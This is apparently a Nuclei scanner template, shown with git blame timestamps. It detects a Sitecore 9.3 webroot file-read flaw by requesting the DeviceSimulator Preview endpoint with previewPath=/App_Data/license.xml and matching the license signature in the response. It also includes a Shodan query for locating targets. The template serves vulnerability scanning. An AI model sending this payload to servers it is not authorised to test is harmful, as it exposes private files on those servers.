nuclei-templates/http/misconfiguration/sitecore-lfi.yaml

32 lines
721 B
YAML
Raw Normal View History

2023-05-14 21:06:17 +00:00
id: sitecore-lfi
info:
name: Sitecore 9.3 - Webroot File Read
author: DhiyaneshDK
severity: high
reference:
- https://blog.assetnote.io/2023/05/10/sitecore-round-two/
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-05-14 21:06:17 +00:00
shodan-query: title:"Sitecore"
tags: sitecore,lfi
http:
- method: GET
path:
- "{{BaseURL}}/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-05-18 13:54:58 +00:00
- "<signedlicense id="
- "<Signature"
condition: and
2023-05-14 21:06:17 +00:00
- type: status
status:
- 200